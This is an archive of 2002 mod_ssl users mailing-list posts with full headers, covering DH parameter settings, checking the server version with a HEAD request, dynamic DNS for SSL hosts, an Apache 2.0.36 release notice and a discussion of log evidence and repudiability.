Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jmos@gmx.net
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello MOD_SSL users!

I'm reading the mailing list for a while now but couldn't find
an answer to the following two questions. Maybe one of you can
help me.

Is there any possibility to specify the DH parameters which are
used by the EDH cipher suites (key length etc.) ?

Which parameters ared used by default ?


Any help very much appreciated!

Thanks in advance

Jens

-- 
GMX - Die Kommunikationsplattform im Internet.
http://www.gmx.net
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  8 09:07:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA08532; Wed, 8 May 2002 09:06:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bull1.bourse.ch id JAA08225; Wed, 8 May 2002 09:05:11 +0200 (MET DST)
Received: (from nobody@localhost)
	by bull1.bourse.ch (8.8.8+Sun/8.8.8) id JAA10246
	for ; Wed, 8 May 2002 09:05:04 +0200 (MET DST)
X-Authentication-Warning: bull1.bourse.ch: nobody set sender to  using -f
Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1)
	id xma010244; Wed, 8 May 02 09:05:03 +0200
Received: from regulus.bourse.ch (regulus [172.20.196.148])
	by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id JAA00754
	for ; Wed, 8 May 2002 09:05:02 +0200 (MET DST)
Received: from bourse.ch (localhost [127.0.0.1])
	by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id JAA20131
	for ; Wed, 8 May 2002 09:05:02 +0200 (MEST)
Message-ID: <3CD8CE1E.607277FF@bourse.ch>
Date: Wed, 08 May 2002 09:05:02 +0200
From: Owen Boyle 
X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: mod_ssl version
References: <20020508011830.54082.qmail@web13603.mail.yahoo.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Owen Boyle 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

John Ratelle wrote:
> 
> How does one determine the version of mod_ssl
> installed with apache?

Assuming you have "ServerTokens" set to its default value (Full), then
if you usxe the HTTP "HEAD" command from the command line, you get the
full server signature - i.e.

$ telnet  80

then type in:

	HEAD / HTTP/1.0

followed by two carriage-returns, you will get:

	HTTP/1.1 200 OK
	Date: Wed, 08 May 2002 07:01:34 GMT
	Server: Apache/1.3.22 (Unix) mod_perl/1.25 mod_ssl/2.8.5 OpenSSL/0.9.6b
	etc...


Rgds,

Owen Boyle
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  8 09:33:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA09939; Wed, 8 May 2002 09:32:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from grant.org id JAA09892; Wed, 8 May 2002 09:31:12 +0200 (MET DST)
Received: from splat.grant.org (mgrant@splat.grant.org [213.39.2.177])
	by grant.org (8.11.6/8.11.6) with ESMTP id g487UrQ76931
	for ; Wed, 8 May 2002 03:30:54 -0400 (EDT)
	(envelope-from mgrant@splat.grant.org)
Received: (from mgrant@localhost)
	by splat.grant.org (8.11.6+Sun/8.11.6) id g487Uom21716;
	Wed, 8 May 2002 09:30:50 +0200 (MEST)
Date: Wed, 8 May 2002 09:30:50 +0200 (MEST)
Message-Id: <200205080730.g487Uom21716@splat.grant.org>
From: Michael Grant 
To: modssl-users@modssl.org
Subject: Re: Dynamic IP Addressing
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Michael Grant 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Jack,

Would something like www.dyndns.org help you?

Michael Grant
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  8 09:59:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA11491; Wed, 8 May 2002 09:58:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marvin-lnx.int.tele.dk id JAA11444; Wed, 8 May 2002 09:57:40 +0200 (MET DST)
Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500)
	id 6B767BD2C; Wed,  8 May 2002 09:58:45 +0200 (CEST)
Date: Wed, 8 May 2002 09:58:45 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Fw: Apache 2.0.36 released
Message-ID: <20020508075845.GA3308@marvin-lnx.int.tele.dk>
Mail-Followup-To: modssl-users@modssl.org
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="pf9I7BMVVzbSWLtt"
Content-Disposition: inline
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


--pf9I7BMVVzbSWLtt
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

Several mod_ssl related changes in this one - from the changes file:

  *) Reverted a minor optimization in mod_ssl.c that used the vhost ID
     as the session id context rather that a MD5 hash of that vhost ID,
     because it caused very long vhost id's to be unusable with mod_ssl.
     PR 8572.  [Cliff Woolley]

  *) Fixed SHMCB session caching.  [Aaron Bannert, Cliff Woolley]

  *) Synced with remaining changes from mod_ssl 2.8.8-1.3.24:
     - Avoid SIGBUS on sparc machines with SHMCB session caches
     - Allow whitespace between the pipe and the name of the
     program in SSLLog "| /path/to/program".  [Cliff Woolley]

  *) fix possible compilation problem in ssl_engine_kernel.c. PR 7802
     [Doug MacEachern]

  *) fix possible infinite loop in mod_ssl triggered by certain
     netscape clients [Doug MacEachern]

  *) fix ProxyPass when frontend is https and backend is http
     [Doug MacEachern]


vh

Mads Toftum
-- 
With a rubber duck, one's never alone.
              -- "The Hitchhiker's Guide to the Galaxy"

--pf9I7BMVVzbSWLtt
Content-Type: message/rfc822
Content-Disposition: inline

Return-Path: 
Delivered-To: mt@localhost.int.tele.dk
Received: from localhost (localhost.localdomain [127.0.0.1])
	by marvin-lnx.int.tele.dk (Postfix) with ESMTP id 915B7BD2C
	for ; Wed,  8 May 2002 02:04:05 +0200 (CEST)
Received: from mailhotel2.inet.tele.dk [194.182.149.79]
	by localhost with POP3 (fetchmail-5.8.6)
	for mt@localhost (single-drop); Wed, 08 May 2002 02:04:05 +0200 (CEST)
Received: from mail-in1.inet.tele.dk ([194.182.148.158])
          by mailhotel2.inet.tele.dk (Netscape Mail Server v2.02)
          with ESMTP id AAA76296 for ;
          Wed, 8 May 2002 02:02:50 +0200
Received: from apache.org (daedalus.apache.org [63.251.56.142])
	by mail-in1.inet.tele.dk (Postfix) with SMTP id 0996F6568
	for ; Wed,  8 May 2002 02:02:49 +0200 (CEST)
Received: (qmail 77591 invoked by uid 500); 8 May 2002 00:00:20 -0000
Mailing-List: contact announce-help@httpd.apache.org; run by ezmlm
Precedence: bulk
list-help: 
list-unsubscribe: 
list-post: 
Delivered-To: mailing list announce@httpd.apache.org
Delivered-To: moderator for announce@httpd.apache.org
Received: (qmail 54278 invoked from network); 7 May 2002 23:13:08 -0000
From: "Sander Striker" 
To: 
Subject: Apache 2.0.36 released
Date: Wed, 8 May 2002 01:21:01 +0200
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
X-Rcpt-To: 
X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N
Content-Transfer-Encoding: 7bit

It's a pleasure to announce the second public release of the Apache
Software Foundation's Apache HTTP Server.

The Apache HTTP Server Project signed off on the 2.0.35 release one
month ago.  Since then we have received a lot of feedback from our
users which led to lots of improvements in the codebase.  We feel that
this version, 2.0.36, is now to be considered our best release and
should be used in preference to all older versions.

In case you missed it earlier, the Apache 2.0 series brings new
features to the ASF's HTTP server:

  - higher performance over 1.3
  - multiple operational models: threaded, hybrid processes/threads, and
    specific request processing for Windows, Netware, BeOS, and OS/2
  - integrated SSL and WebDAV support
  - improved HTTP proxy support
  - I/O layering and filtering


You can find more information, and download the server, from our website:
    http://httpd.apache.org/

Please see the CHANGES_2.0 file on http://httpd.apache.org/dist/httpd/ for
a full list of changes.


Thanks for using Apache,

Sander Striker

--pf9I7BMVVzbSWLtt--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  8 10:17:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA13239; Wed, 8 May 2002 10:16:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id KAA13225; Wed, 8 May 2002 10:16:07 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g488Fhv24990
	for ; Wed, 8 May 2002 08:15:48 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Wed, 8 May 2002 09:15:40 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F02067014@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: Repudiability
Date: Wed, 8 May 2002 09:15:39 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> -----Original Message-----
> From: Aryeh Katz [mailto:aryeh@vasco.com]
> Sent: 07 May 2002 21:43
> To: modssl-users@modssl.org
> Subject: Re: Repudiability
> 
> 
> > It seems we have a poor basis for a new economy given that 
> we know how
> > to do these things properly.  I wonder how long it will be before a
> > test case arises.
> > 
> > Apart from the SSL stuff, we also need to be able to have the client
> > sign both the recieved form and the data they return as a 
> single unit
> > in order to prove the context of their submission.
> 
> I don't know that we're that bad. Netscape communicator does 
> have a Javascipt function called signText, which you could 
> use of form submission (along with client 
> certs). It's similarly possible to code an activex control 
> for IE that would sign a form.
> This is not to say that there couldn't be better repudiation 
> in the ssl layer. Merely, that if you had to, you could 
> conduct business in a reasonable fashion.
> 

I think the point about faking logs is relevant, but only if taken in
context. Like I said, IANAL, but I have taken a case all the way to the
second highest court in England and Wales and won.

Any evidence can be faked, regardless of where it came from. Any evidence
can also be mis-interpreted. I know a man who was imprisoned for murder on
the basis that his Taxi logs were missing on the night of the murder, the
victim had a scarf which was alleged to belong to this man and the victim
had the man's telephone number in his diary. He has now been freed.

Getting back to the point, server logs detailing abuse are admissible as
evidence, provided that the person submitting them is able to verify that
they haven't been tampered with. To state in court that they haven't been
tampered with when they have is perjury. That carries a prison sentence in
my country, and probably in many others too.

Having said that, it is entirely up to the Judge at the time to decide what
is and what isn't admissible as evidence. They could refuse any evidence you
have, even if you have perfect repudiation. Furthermore, no matter how
complex you make the identification, there is still a mathematical
possibility that the identification is incorrect. For example, when giving
fingerprint evidence juries have to be informed of the statistical
likelihood of two people having the same fingerprints. It used to be said
that this was as likely as winning the football pools every week for a year.

The only certain things are death and taxes (although they are many more
things I am certain of).

- 
John Airey
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

The teaching of evolution as a proven fact rather than a theory has done
more harm to scientific progress than anything else in history.

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 

14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
find out all about it.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  8 15:50:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA06693; Wed, 8 May 2002 15:49:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail1.rdcss.com id PAA06637; Wed, 8 May 2002 15:48:07 +0200 (MET DST)
From: robert@rdcss.com
Received: from me (unknown [192.168.0.5])
	by mail1.rdcss.com (Postfix) with SMTP id 3A9971BA56
	for ; Wed,  8 May 2002 13:47:57 +0000 (UTC)
Message-ID: <00a401c1f696$8263f240$0500a8c0@rdcss.com>
To: 
References: <3CD8B539.866EC414@cfl.rr.com>
Subject: Re: Dynamic IP Addressing
Date: Wed, 8 May 2002 08:44:42 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_00A1_01C1F66C.98CC20E0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: robert@rdcss.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_00A1_01C1F66C.98CC20E0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: base64

d3d3LnpvbmVlZGl0LmNvbSB0aGV5IGNhbiBhbGxvdyB5b3UgdG8gaGF2ZSBhIGRvbWFpbiBuYW1l
IHRhZ2dlZCB0aHJ1IGEgZHluYW1pYyBpcCBhZGRyZXNzLiAgeW91IGhhdmUgdG8gaG9zdCB0aGUg
ZG9tYWluIG5hbWUgdGhleSBob3N0IHlvdXIgZG5zIGZvciB0aGUgZG9tYWluIG5hbWUuDQogIC0t
LS0tIE9yaWdpbmFsIE1lc3NhZ2UgLS0tLS0gDQogIEZyb206IEphY2sgSmFjb2JzZW4gDQogIFRv
OiBtb2Rzc2wtdXNlcnNAbW9kc3NsLm9yZyANCiAgU2VudDogV2VkbmVzZGF5LCBNYXkgMDgsIDIw
MDIgMTI6MTggQU0NCiAgU3ViamVjdDogRHluYW1pYyBJUCBBZGRyZXNzaW5nDQoNCg0KICBJJ3Zl
IHJlY2VudGx5IHN0YXJ0ZWQgdXNpbmcgdGhlIEFwYWNoZSBIVFRQIHNlcnZlciBhbmQgcmVhbGx5
IGxpa2UgaXQgYSBsb3QuICBPbmUgZ3JlYXQgYWR2YW50YWdlIGlzIHRoZSBTU0wgY2FwYWJpbGl0
eSwgd2hpY2ggSSBpbnRlbmQgdG8gdXNlIGlmIEkgY2FuLiAgVGhhdCBsZWFkcyBtZSB0byBteSBx
dWVzdGlvbi4gIEkgdXNlIGEgY29tbWVyY2lhbCB3ZWIgaG9zdCBmb3IgdGhlIHdlYiBzaXRlIGZv
ciBteSBob21lIGJ1c2luZXNzLCBidXQgbmVlZCB0byB1c2UgbXkgaG9tZSBjb21wdXRlciBhcyBh
IGRvd25sb2FkIHNlcnZlciB0byBkaXN0cmlidXRlIHJhdGhlciBsYXJnZSBhdWRpbyBmaWxlcyB0
byBteSBjbGllbnRzLiAgSSBjdXJyZW50bHkgYWNjZXNzIG15IGhvbWUgc2VydmVyIHRocm91Z2gg
YSBsaW5rIG9uIHRoZSBtYWluIHNpdGUsIHVzaW5nIG15IGhvbWUgY29tcHV0ZXIncyBJUCBhZGRy
ZXNzLCB3aGljaCBoYXMgcmVhbGx5IHdvcmtlZCB3ZWxsLiAgSSBjYW4gb2ZmZXIgdGhlc2UgbGFy
Z2UgZmlsZXMgZm9yIGRvd25sb2FkaW5nIHRvIG15IGN1c3RvbWVycyBvbiB0aGUgbWFpbiBzaXRl
IGFuZCB0aGV5IG5ldmVyIHJlYWxseSBrbm93IHRoYXQgdGhleSdyZSBiZWluZyBzZXJ2ZWQgdXAg
ZnJvbSBteSBjb21wdXRlciBhdCBob21lLiANCiAgVGhlIHByb2JsZW0gaXMgdGhhdCBJJ2QgbGlr
ZSB0byBvZmZlciBTU0wgYXMgYSBmZWF0dXJlIG9mIG15IGhvbWUgZG93bmxvYWQgc2VydmVyLiAg
SSd2ZSBnb3QgYSBicm9hZGJhbmQgY29ubmVjdGlvbiB3aXRoIGEgY29tcGFueSB0aGF0IGRvZXNu
J3Qgb2ZmZXIgc3RhdGljIElQIGFkZHJlc3NpbmcgZm9yIGl0J3MgdXNlcnMsIHNvIG15IGhvbWUg
SVAgYWRkcmVzcyBjaGFuZ2VzIG5vdyBhbmQgdGhlbi4gIEkgdGhlbiBzaW1wbHkgaGF2ZSB0byBn
byB0byB0aGUgbWFpbiBzaXRlIGFuZCB1cGRhdGUgbXkgbGluayB0byB0aGUgc2VydmVyIHRvIHJl
ZmxlY3QgdGhlIG5ldyBJUCBhZGRyZXNzIGFuZCBJJ20gYmFjayBpbiBidXNpbmVzcywgYnV0IEkn
bSB3b25kZXJpbmcgaWYgdGhpcyB3aWxsIHByb2hpYml0IG1lIGZyb20gdXNpbmcgU1NMLiAgSSdt
IG5vdCBzdXJlIGhvdyB0byBvdmVyY29tZSB0aGUgbmFtZSBtYXRjaGluZyB0aGF0IHRoZSBTU0wg
Y2VydGlmaWNhdGUgcmVxdWlyZXMuICBJIGNhbid0IGFwcGx5IGZvciBhIGNlcnRpZmljYXRlIHVz
aW5nIGFuIElQIGFkZHJlc3MgZm9yIGFuIGlkZW50aXR5LCBiZWNhdXNlIGl0J2xsIGNoYW5nZSwg
YnV0IEkgYWxzbyBjYW4ndCB1c2UgdGhlIGRvbWFpbiBuYW1lIG9mIG15IGNvbXB1dGVyIGJlY2F1
c2UgbXkgY2xpZW50J3MgYnJvd3NlcidzIHNlZSBvbmx5IHRoZSBJUCBhZGRyZXNzIHVzZWQgZm9y
IGFjY2Vzcy4gDQoNCiAgV2hhdCBJJ2QgbGlrZSB0byBrbm93IGlzIGlmIHRoZXJlJ3MgYW55IHdh
eSB0byBjb25maWd1cmUgQXBhY2hlK21vZC1zc2wgdG8gcmV0dXJuIG15IGNvbXB1dGVyJ3MgZG9t
YWluIG5hbWUsIGV2ZW4gaWYgaXQncyBhY2Nlc3NlZCBieSB3YXkgb2YgaXQncyBJUCBhZGRyZXNz
PyAgVGhhdCB3b3VsZCBnaXZlIG1lIGEgY29uc2lzdGVudCBuYW1lIHRoYXQgd291bGQgc2F0aXNm
eSB0aGUgU1NMIGNlcnRpZmljYXRlIG5hbWUgbWF0Y2hpbmcuICBXaGVuIG15IElQIGFkZHJlc3Mg
Y2hhbmdlcywgYWxsIEknZCBuZWVkIHRvIGRvIGlzIHVwZGF0ZSBteSBodHRwZC5jb25mIGZpbGUg
dG8gcmVmbGVjdCB0aGUgbmV3IElQIGFkZHJlc3MgdG8gcmVzcG9uZCB0byBhbmQgdGhlIFNTTCBj
ZXJ0aWZpY2F0ZSBzaG91bGQgbmV2ZXIga25vdyB0aGUgZGlmZmVyZW5jZS4gDQoNCiAgSSBrbm93
IHRoYXQgdGhpcyBpcyBhIHJldmVyc2UgRE5TIGZ1bmN0aW9uIG9mIHNvcnRzIGFuZCBJJ20gcHJl
dHR5IHN1cmUgdGhhdCB0aGVyZSdzIGEgd2F5IG9mIGRvaW5nIGl0LCBidXQgc28gZmFyIEkndmUg
cmVhZCBhbGwgdGhlIGRvY3VtZW50YXRpb24gdGhhdCBJIGNvdWxkIGZpbmQgb24gaHR0cGQuY29u
ZiBjb25maWd1cmF0aW9uLCBidXQgc3RpbGwgaGF2ZW4ndCBoYWQgYW55IGx1Y2suICBJJ2Qgc3Vy
ZSBhcHByZWNpYXRlIGFueSBoZWxwIHRoYXQgeW91IGNvdWxkIHByb3ZpZGUuIA0KDQogIFRoYW5r
cyANCg0KLS0gDQpKYWNrIEphY29ic2VuDQpqY2pAY2ZsLnJyLmNvbQ0KVm9pY2UgKDQwNykgNjM2
LTk0NTgNCkZBWCAgICg0MDcpIDYzMi04MTg5DQogICAgX19fX19fX19fX19fX19fX19fX19fX19f
X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fXyBBcGFjaGUgSW50
ZXJmYWNlIHRvIE9wZW5TU0wgKG1vZF9zc2wpIHd3dy5tb2Rzc2wub3JnIFVzZXIgU3VwcG9ydCBN
YWlsaW5nIExpc3QgbW9kc3NsLXVzZXJzQG1vZHNzbC5vcmcgQXV0b21hdGVkIExpc3QgTWFuYWdl
ciBtYWpvcmRvbW9AbW9kc3NsLm9yZyANCg==

------=_NextPart_000_00A1_01C1F66C.98CC20E0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: base64

PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9uYWwv
L0VOIj4NCjxIVE1MPjxIRUFEPg0KPE1FVEEgaHR0cC1lcXVpdj1Db250ZW50LVR5cGUgY29udGVu
dD0idGV4dC9odG1sOyBjaGFyc2V0PWlzby04ODU5LTEiPg0KPE1FVEEgY29udGVudD0iTVNIVE1M
IDYuMDAuMjYwMC4wIiBuYW1lPUdFTkVSQVRPUj4NCjxTVFlMRT48L1NUWUxFPg0KPC9IRUFEPg0K
PEJPRFkgYmdDb2xvcj0jZmZmZmZmPg0KPERJVj48Rk9OVCBmYWNlPUFyaWFsIHNpemU9Mj48QSAN
CmhyZWY9Imh0dHA6Ly93d3cuem9uZWVkaXQuY29tIj53d3cuem9uZWVkaXQuY29tPC9BPiB0aGV5
IGNhbiBhbGxvdyB5b3UgdG8gaGF2ZSBhIA0KZG9tYWluIG5hbWUgdGFnZ2VkIHRocnUgYSBkeW5h
bWljIGlwIGFkZHJlc3MuJm5ic3A7IHlvdSBoYXZlIHRvIGhvc3QgdGhlIGRvbWFpbiANCm5hbWUg
dGhleSBob3N0IHlvdXIgZG5zIGZvciB0aGUgZG9tYWluIG5hbWUuPC9GT05UPjwvRElWPg0KPEJM
T0NLUVVPVEUgDQpzdHlsZT0iUEFERElORy1SSUdIVDogMHB4OyBQQURESU5HLUxFRlQ6IDVweDsg
TUFSR0lOLUxFRlQ6IDVweDsgQk9SREVSLUxFRlQ6ICMwMDAwMDAgMnB4IHNvbGlkOyBNQVJHSU4t
UklHSFQ6IDBweCI+DQogIDxESVYgc3R5bGU9IkZPTlQ6IDEwcHQgYXJpYWwiPi0tLS0tIE9yaWdp
bmFsIE1lc3NhZ2UgLS0tLS0gPC9ESVY+DQogIDxESVYgDQogIHN0eWxlPSJCQUNLR1JPVU5EOiAj
ZTRlNGU0OyBGT05UOiAxMHB0IGFyaWFsOyBmb250LWNvbG9yOiBibGFjayI+PEI+RnJvbTo8L0I+
IA0KICA8QSB0aXRsZT1qY2pAY2ZsLnJyLmNvbSBocmVmPSJtYWlsdG86amNqQGNmbC5yci5jb20i
PkphY2sgSmFjb2JzZW48L0E+IDwvRElWPg0KICA8RElWIHN0eWxlPSJGT05UOiAxMHB0IGFyaWFs
Ij48Qj5Ubzo8L0I+IDxBIHRpdGxlPW1vZHNzbC11c2Vyc0Btb2Rzc2wub3JnIA0KICBocmVmPSJt
YWlsdG86bW9kc3NsLXVzZXJzQG1vZHNzbC5vcmciPm1vZHNzbC11c2Vyc0Btb2Rzc2wub3JnPC9B
PiA8L0RJVj4NCiAgPERJViBzdHlsZT0iRk9OVDogMTBwdCBhcmlhbCI+PEI+U2VudDo8L0I+IFdl
ZG5lc2RheSwgTWF5IDA4LCAyMDAyIDEyOjE4IA0KICBBTTwvRElWPg0KICA8RElWIHN0eWxlPSJG
T05UOiAxMHB0IGFyaWFsIj48Qj5TdWJqZWN0OjwvQj4gRHluYW1pYyBJUCBBZGRyZXNzaW5nPC9E
SVY+DQogIDxESVY+PEJSPjwvRElWPkkndmUgcmVjZW50bHkgc3RhcnRlZCB1c2luZyB0aGUgQXBh
Y2hlIEhUVFAgc2VydmVyIGFuZCByZWFsbHkgDQogIGxpa2UgaXQgYSBsb3QuJm5ic3A7IE9uZSBn
cmVhdCBhZHZhbnRhZ2UgaXMgdGhlIFNTTCBjYXBhYmlsaXR5LCB3aGljaCBJIGludGVuZCANCiAg
dG8gdXNlIGlmIEkgY2FuLiZuYnNwOyBUaGF0IGxlYWRzIG1lIHRvIG15IHF1ZXN0aW9uLiZuYnNw
OyBJIHVzZSBhIGNvbW1lcmNpYWwgDQogIHdlYiBob3N0IGZvciB0aGUgd2ViIHNpdGUgZm9yIG15
IGhvbWUgYnVzaW5lc3MsIGJ1dCBuZWVkIHRvIHVzZSBteSBob21lIA0KICBjb21wdXRlciBhcyBh
IGRvd25sb2FkIHNlcnZlciB0byBkaXN0cmlidXRlIHJhdGhlciBsYXJnZSBhdWRpbyBmaWxlcyB0
byBteSANCiAgY2xpZW50cy4mbmJzcDsgSSBjdXJyZW50bHkgYWNjZXNzIG15IGhvbWUgc2VydmVy
IHRocm91Z2ggYSBsaW5rIG9uIHRoZSBtYWluIA0KICBzaXRlLCB1c2luZyBteSBob21lIGNvbXB1
dGVyJ3MgSVAgYWRkcmVzcywgd2hpY2ggaGFzIHJlYWxseSB3b3JrZWQgd2VsbC4mbmJzcDsgDQog
IEkgY2FuIG9mZmVyIHRoZXNlIGxhcmdlIGZpbGVzIGZvciBkb3dubG9hZGluZyB0byBteSBjdXN0
b21lcnMgb24gdGhlIG1haW4gc2l0ZSANCiAgYW5kIHRoZXkgbmV2ZXIgcmVhbGx5IGtub3cgdGhh
dCB0aGV5J3JlIGJlaW5nIHNlcnZlZCB1cCBmcm9tIG15IGNvbXB1dGVyIGF0IA0KICBob21lLiAN
CiAgPFA+VGhlIHByb2JsZW0gaXMgdGhhdCBJJ2QgbGlrZSB0byBvZmZlciBTU0wgYXMgYSBmZWF0
dXJlIG9mIG15IGhvbWUgZG93bmxvYWQgDQogIHNlcnZlci4mbmJzcDsgSSd2ZSBnb3QgYSBicm9h
ZGJhbmQgY29ubmVjdGlvbiB3aXRoIGEgY29tcGFueSB0aGF0IGRvZXNuJ3QgDQogIG9mZmVyIHN0
YXRpYyBJUCBhZGRyZXNzaW5nIGZvciBpdCdzIHVzZXJzLCBzbyBteSBob21lIElQIGFkZHJlc3Mg
Y2hhbmdlcyBub3cgDQogIGFuZCB0aGVuLiZuYnNwOyBJIHRoZW4gc2ltcGx5IGhhdmUgdG8gZ28g
dG8gdGhlIG1haW4gc2l0ZSBhbmQgdXBkYXRlIG15IGxpbmsgDQogIHRvIHRoZSBzZXJ2ZXIgdG8g
cmVmbGVjdCB0aGUgbmV3IElQIGFkZHJlc3MgYW5kIEknbSBiYWNrIGluIGJ1c2luZXNzLCBidXQg
SSdtIA0KICB3b25kZXJpbmcgaWYgdGhpcyB3aWxsIHByb2hpYml0IG1lIGZyb20gdXNpbmcgU1NM
LiZuYnNwOyBJJ20gbm90IHN1cmUgaG93IHRvIA0KICBvdmVyY29tZSB0aGUgbmFtZSBtYXRjaGlu
ZyB0aGF0IHRoZSBTU0wgY2VydGlmaWNhdGUgcmVxdWlyZXMuJm5ic3A7IEkgY2FuJ3QgDQogIGFw
cGx5IGZvciBhIGNlcnRpZmljYXRlIHVzaW5nIGFuIElQIGFkZHJlc3MgZm9yIGFuIGlkZW50aXR5
LCBiZWNhdXNlIGl0J2xsIA0KICBjaGFuZ2UsIGJ1dCBJIGFsc28gY2FuJ3QgdXNlIHRoZSBkb21h
aW4gbmFtZSBvZiBteSBjb21wdXRlciBiZWNhdXNlIG15IA0KICBjbGllbnQncyBicm93c2VyJ3Mg
c2VlIG9ubHkgdGhlIElQIGFkZHJlc3MgdXNlZCBmb3IgYWNjZXNzLiANCiAgPFA+V2hhdCBJJ2Qg
bGlrZSB0byBrbm93IGlzIGlmIHRoZXJlJ3MgYW55IHdheSB0byBjb25maWd1cmUgQXBhY2hlK21v
ZC1zc2wgdG8gDQogIHJldHVybiBteSBjb21wdXRlcidzIGRvbWFpbiBuYW1lLCBldmVuIGlmIGl0
J3MgYWNjZXNzZWQgYnkgd2F5IG9mIGl0J3MgSVAgDQogIGFkZHJlc3M/Jm5ic3A7IFRoYXQgd291
